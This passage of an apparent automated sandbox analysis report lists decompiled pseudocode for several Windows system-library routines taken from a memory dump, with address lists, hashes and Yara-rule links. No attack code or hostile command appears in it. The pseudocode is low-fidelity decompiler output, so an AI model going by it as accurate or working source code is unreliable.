						E04FB88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04F3D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4fd86c0; // 0x30007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4fd86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04F02280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04FB88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04F2AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4fdb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4fd84c0;
										if(_t69 >=  *0x4fd84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04FB9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04EE922A(_t82);
							_t53 = E04F07D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04FB8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4fd86c0; // 0x30007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4fd86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4fd86bc;
										_t72 = 0x4fd86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04EE9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4fd86c4;
									_t72 = 0x4fd86c0;
									L18:
									E04F19B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                                                0x04ee9100
                                                                                                                                0x04ee9100
                                                                                                                                0x04ee9100
                                                                                                                                0x04ee9100
                                                                                                                                0x04ee9102
                                                                                                                                0x04ee9107
                                                                                                                                0x04ee910c
                                                                                                                                0x04ee9110
                                                                                                                                0x04ee9115
                                                                                                                                0x04ee9136
                                                                                                                                0x04ee9143
                                                                                                                                0x04f437e4
                                                                                                                                0x04f437e4
                                                                                                                                0x04ee9149
                                                                                                                                0x04ee914e
                                                                                                                                0x04ee914e
                                                                                                                                0x04ee9117
                                                                                                                                0x04ee911d
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ee911f
                                                                                                                                0x04ee9125
                                                                                                                                0x00000000
                                                                                                                                0x04ee9151
                                                                                                                                0x04ee9158
                                                                                                                                0x04ee915d
                                                                                                                                0x04ee9161
                                                                                                                                0x04ee9168
                                                                                                                                0x04f43715
                                                                                                                                0x00000000
                                                                                                                                0x04ee916e
                                                                                                                                0x04ee916e
                                                                                                                                0x04ee9175
                                                                                                                                0x04ee9177
                                                                                                                                0x04ee917e
                                                                                                                                0x04ee917f
                                                                                                                                0x04ee9182
                                                                                                                                0x04ee9182
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee918a
                                                                                                                                0x04ee918d
                                                                                                                                0x04ee918f
                                                                                                                                0x04ee9192
                                                                                                                                0x04ee9195
                                                                                                                                0x04ee9198
                                                                                                                                0x04ee9198
                                                                                                                                0x04ee9198
                                                                                                                                0x04ee919a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4371f
                                                                                                                                0x04f43721
                                                                                                                                0x04f43727
                                                                                                                                0x04f4372f
                                                                                                                                0x04f43733
                                                                                                                                0x04f43735
                                                                                                                                0x04f43738
                                                                                                                                0x04f4373b
                                                                                                                                0x04f4373d
                                                                                                                                0x04f43740
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f43746
                                                                                                                                0x04f43749
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4374f
                                                                                                                                0x04f43751
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f43757
                                                                                                                                0x04f43759
                                                                                                                                0x04f4375c
                                                                                                                                0x04f4375c
                                                                                                                                0x04f4375e
                                                                                                                                0x04f4375e
                                                                                                                                0x04f43761
                                                                                                                                0x04f43764
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f43766
                                                                                                                                0x04f43768
                                                                                                                                0x04f437a3
                                                                                                                                0x04f437a3
                                                                                                                                0x04f437a5
                                                                                                                                0x04f437a7
                                                                                                                                0x04f437ad
                                                                                                                                0x04f437b0
                                                                                                                                0x04f437b2
                                                                                                                                0x04f437bc
                                                                                                                                0x04f437c2
                                                                                                                                0x04f437c2
                                                                                                                                0x04f437b2
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee918a
                                                                                                                                0x04ee918d
                                                                                                                                0x04ee918f
                                                                                                                                0x04ee9192
                                                                                                                                0x04ee9195
                                                                                                                                0x00000000
                                                                                                                                0x04ee9195
                                                                                                                                0x00000000
                                                                                                                                0x04ee9187
                                                                                                                                0x04f4376a
                                                                                                                                0x04f4376a
                                                                                                                                0x04f4376c
                                                                                                                                0x04f4376c
                                                                                                                                0x04f4376f
                                                                                                                                0x04f43775
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f43777
                                                                                                                                0x04f43779
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f43782
                                                                                                                                0x04f43787
                                                                                                                                0x04f43789
                                                                                                                                0x04f43790
                                                                                                                                0x04f43790
                                                                                                                                0x04f4378b
                                                                                                                                0x04f4378b
                                                                                                                                0x04f4378b
                                                                                                                                0x04f43792
                                                                                                                                0x04f43795
                                                                                                                                0x04f43795
                                                                                                                                0x04f43798
                                                                                                                                0x04f43798
                                                                                                                                0x04f4379b
                                                                                                                                0x04f4379b
                                                                                                                                0x04ee91a3
                                                                                                                                0x04ee91a9
                                                                                                                                0x04ee91b0
                                                                                                                                0x04ee91b4
                                                                                                                                0x04ee91b4
                                                                                                                                0x04ee91bb
                                                                                                                                0x04ee91c0
                                                                                                                                0x04ee91c5
                                                                                                                                0x04ee91c7
                                                                                                                                0x04f437da
                                                                                                                                0x04ee91cd
                                                                                                                                0x04ee91cd
                                                                                                                                0x04ee91cd
                                                                                                                                0x04ee91d2
                                                                                                                                0x04ee91d5
                                                                                                                                0x04ee9239
                                                                                                                                0x04ee9239
                                                                                                                                0x04ee91d7
                                                                                                                                0x04ee91db
                                                                                                                                0x04ee91e1
                                                                                                                                0x04ee91e7
                                                                                                                                0x04ee91fd
                                                                                                                                0x04ee9203
                                                                                                                                0x04ee921e
                                                                                                                                0x04ee9223
                                                                                                                                0x00000000
                                                                                                                                0x04ee9223
                                                                                                                                0x04ee9205
                                                                                                                                0x04ee9208
                                                                                                                                0x04ee920c
                                                                                                                                0x04ee9214
                                                                                                                                0x04ee9214
                                                                                                                                0x04ee91e9
                                                                                                                                0x04ee91e9
                                                                                                                                0x04ee91ee
                                                                                                                                0x04ee91f3
                                                                                                                                0x04ee91f3
                                                                                                                                0x04ee91f3
                                                                                                                                0x04ee91e7
                                                                                                                                0x00000000
                                                                                                                                0x04ee91db
                                                                                                                                0x04ee9187
                                                                                                                                0x04ee9168

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9269f3efd880c4c7fc29bec891ed0c01c992c03486329f426d950aabd58b70d0
                                                                                                                                • Instruction ID: e5178194283df62cd0b6b407bd93247ce3b085184df67ed5e576512e38bf5575
                                                                                                                                • Opcode Fuzzy Hash: 9269f3efd880c4c7fc29bec891ed0c01c992c03486329f426d950aabd58b70d0
                                                                                                                                • Instruction Fuzzy Hash: 2C31F8B1A01244DFEB21DF6AC8487FCBBF1BB89358F158249C45467342D335B941CB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F00050, Relevance: .1, Instructions: 81COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 53%
                                                                                                                                			E04F00050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4fdd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04F19ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04F2B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04FB8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04F19702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4fdb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                                                0x04f00055
                                                                                                                                0x04f0005d
                                                                                                                                0x04f00062
                                                                                                                                0x04f0006c
                                                                                                                                0x04f0006f
                                                                                                                                0x04f00074
                                                                                                                                0x04f0007a
                                                                                                                                0x04f0007a
                                                                                                                                0x04f00080
                                                                                                                                0x04f00080
                                                                                                                                0x04f00087
                                                                                                                                0x04f0008d
                                                                                                                                0x04f0008f
                                                                                                                                0x04f00093
                                                                                                                                0x04f00095
                                                                                                                                0x04f0009b
                                                                                                                                0x04f000f8
                                                                                                                                0x04f000fb
                                                                                                                                0x04f000fc
                                                                                                                                0x04f000ff
                                                                                                                                0x04f00108
                                                                                                                                0x04f00108
                                                                                                                                0x04f000a2
                                                                                                                                0x04f000a6
                                                                                                                                0x04f000b3
                                                                                                                                0x04f000bc
                                                                                                                                0x04f000c5
                                                                                                                                0x04f000ca
                                                                                                                                0x04f4c01e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f4c02d
                                                                                                                                0x04f000d5
                                                                                                                                0x04f000d9
                                                                                                                                0x04f4c03d
                                                                                                                                0x04f4c046
                                                                                                                                0x04f4c046
                                                                                                                                0x04f000df
                                                                                                                                0x04f000e2
                                                                                                                                0x04f000ea
                                                                                                                                0x04f000ef
                                                                                                                                0x04f000f2
                                                                                                                                0x04f000f6
                                                                                                                                0x04f00111
                                                                                                                                0x04f00117
                                                                                                                                0x04f00117
                                                                                                                                0x00000000
                                                                                                                                0x04f000f6
                                                                                                                                0x04f000d0
                                                                                                                                0x04f000d0
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 231dbea4fde80743da7a8225cce33fc2339b1a9a5d54bef19d11ddf628015d90
                                                                                                                                • Instruction ID: d82dc431bca00dd27647b9b56510043a1767af5caa954ef43986aec7603cf883
                                                                                                                                • Opcode Fuzzy Hash: 231dbea4fde80743da7a8225cce33fc2339b1a9a5d54bef19d11ddf628015d90
                                                                                                                                • Instruction Fuzzy Hash: F6318C31601B048FD721CF28D840B96B7E5FF89718F14856DE49687AA0EF75B802DB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F66C0A, Relevance: .1, Instructions: 79COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 77%
                                                                                                                                			E04F66C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04F07D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4fd7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04F04620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04F2F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04F07D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04F29AE0();
						_t23 = L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                                                                0x04f66c0a
                                                                                                                                0x04f66c0f
                                                                                                                                0x04f66c10
                                                                                                                                0x04f66c13
                                                                                                                                0x04f66c15
                                                                                                                                0x04f66c19
                                                                                                                                0x04f66c1c
                                                                                                                                0x04f66c21
                                                                                                                                0x04f66c28
                                                                                                                                0x04f66c3a
                                                                                                                                0x04f66c2a
                                                                                                                                0x04f66c33
                                                                                                                                0x04f66c33
                                                                                                                                0x04f66c3f
                                                                                                                                0x04f66c48
                                                                                                                                0x04f66c4d
                                                                                                                                0x04f66c60
                                                                                                                                0x04f66c65
                                                                                                                                0x04f66c69
                                                                                                                                0x04f66c73
                                                                                                                                0x04f66c79
                                                                                                                                0x04f66c7f
                                                                                                                                0x04f66c86
                                                                                                                                0x04f66c90
                                                                                                                                0x04f66c94
                                                                                                                                0x04f66ca6
                                                                                                                                0x04f66cb2
                                                                                                                                0x04f66cbd
                                                                                                                                0x04f66cbd
                                                                                                                                0x04f66cc3
                                                                                                                                0x04f66cc7
                                                                                                                                0x04f66ccb
                                                                                                                                0x04f66cd0
                                                                                                                                0x04f66cd1
                                                                                                                                0x04f66ce2
                                                                                                                                0x04f66ce2
                                                                                                                                0x04f66c69
                                                                                                                                0x04f66ced

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e3f0f9e5b88c8114c3e7c4823817e0691c94627550f6bb7967aa211bcd697087
                                                                                                                                • Instruction ID: 44115d92a3eaa05f46feb327d4c781e154b811b0af0703c30f941c635567911f
                                                                                                                                • Opcode Fuzzy Hash: e3f0f9e5b88c8114c3e7c4823817e0691c94627550f6bb7967aa211bcd697087
                                                                                                                                • Instruction Fuzzy Hash: 2921AD71A00A44AFE711DB68D940E2AB7B8FF48744F0440AAF905D7791D634FD12DBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F290AF, Relevance: .1, Instructions: 76COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 82%
                                                                                                                                			E04F290AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04F3D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04F1E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04F04620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04F2F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04F1A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                                                0x04f290af
                                                                                                                                0x04f290b8
                                                                                                                                0x04f290bb
                                                                                                                                0x04f290bf
                                                                                                                                0x04f290c2
                                                                                                                                0x04f290c2
                                                                                                                                0x04f290c8
                                                                                                                                0x04f290cb
                                                                                                                                0x04f290cd
                                                                                                                                0x04f614d7
                                                                                                                                0x04f614eb
                                                                                                                                0x04f614eb
                                                                                                                                0x00000000
                                                                                                                                0x04f614eb
                                                                                                                                0x04f614db
                                                                                                                                0x04f614e6
                                                                                                                                0x00000000
                                                                                                                                0x04f614f2
                                                                                                                                0x04f614e8
                                                                                                                                0x00000000
                                                                                                                                0x04f614e8
                                                                                                                                0x04f290d8
                                                                                                                                0x04f290da
                                                                                                                                0x04f290dd
                                                                                                                                0x04f290e5
                                                                                                                                0x00000000
                                                                                                                                0x04f29139
                                                                                                                                0x04f290fa
                                                                                                                                0x04f290fe
                                                                                                                                0x04f29142
                                                                                                                                0x00000000
                                                                                                                                0x04f29142
                                                                                                                                0x04f29104
                                                                                                                                0x04f29107
                                                                                                                                0x04f2910b
                                                                                                                                0x04f29110
                                                                                                                                0x04f29118
                                                                                                                                0x04f29147
                                                                                                                                0x04f29148
                                                                                                                                0x04f2914f
                                                                                                                                0x04f29150
                                                                                                                                0x04f29151
                                                                                                                                0x04f29152
                                                                                                                                0x04f29156
                                                                                                                                0x04f2915d
                                                                                                                                0x04f29160
                                                                                                                                0x04f29168
                                                                                                                                0x04f2916c
                                                                                                                                0x04f291bc
                                                                                                                                0x04f291be
                                                                                                                                0x00000000
                                                                                                                                0x04f291be
                                                                                                                                0x04f2916e
                                                                                                                                0x04f29173
                                                                                                                                0x04f29176
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f2917c
                                                                                                                                0x04f29180
                                                                                                                                0x04f291b5
                                                                                                                                0x00000000
                                                                                                                                0x04f291b5
                                                                                                                                0x04f29182
                                                                                                                                0x04f29185
                                                                                                                                0x04f29189
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f2918e
                                                                                                                                0x04f29190
                                                                                                                                0x04f29198
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f291a0
                                                                                                                                0x00000000
                                                                                                                                0x04f291ad
                                                                                                                                0x04f291ad
                                                                                                                                0x04f291b0
                                                                                                                                0x04f291b1
                                                                                                                                0x00000000
                                                                                                                                0x04f29185
                                                                                                                                0x04f2911a
                                                                                                                                0x04f2911c
                                                                                                                                0x04f2911f
                                                                                                                                0x04f29125
                                                                                                                                0x04f29127
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                • Instruction ID: 57ba3eebeee69fe7025e0ba912d8971143505cc8214f1da6e45a870834947cae
                                                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                • Instruction Fuzzy Hash: 08214FB2A00214EFDB20DF59CA44E6AF7F8EF44754F14886AE945A7250E274BD42DB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F13B7A, Relevance: .1, Instructions: 75COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 59%
                                                                                                                                			E04F13B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4fd84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4fd84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4fd84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04F2AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04F2FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4fd84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4fd84c4; // 0x0
					L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                                                0x04f13b89
                                                                                                                                0x04f13b96
                                                                                                                                0x04f13ba1
                                                                                                                                0x04f13bab
                                                                                                                                0x04f13bb5
                                                                                                                                0x04f13bb9
                                                                                                                                0x04f56298
                                                                                                                                0x04f13bbf
                                                                                                                                0x04f13bc2
                                                                                                                                0x04f13bc3
                                                                                                                                0x04f13bc9
                                                                                                                                0x04f13bca
                                                                                                                                0x04f13bcc
                                                                                                                                0x04f13bcd
                                                                                                                                0x04f13bd4
                                                                                                                                0x04f13bd6
                                                                                                                                0x04f13bdb
                                                                                                                                0x04f13bea
                                                                                                                                0x04f13bf7
                                                                                                                                0x04f13bfb
                                                                                                                                0x04f13bff
                                                                                                                                0x04f13c09
                                                                                                                                0x04f13c0a
                                                                                                                                0x04f13c0b
                                                                                                                                0x04f13c0f
                                                                                                                                0x04f13c14
                                                                                                                                0x04f13c18
                                                                                                                                0x04f13c18
                                                                                                                                0x04f13bfb
                                                                                                                                0x04f13c1b
                                                                                                                                0x04f13c30
                                                                                                                                0x04f13c30
                                                                                                                                0x04f13c3d

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
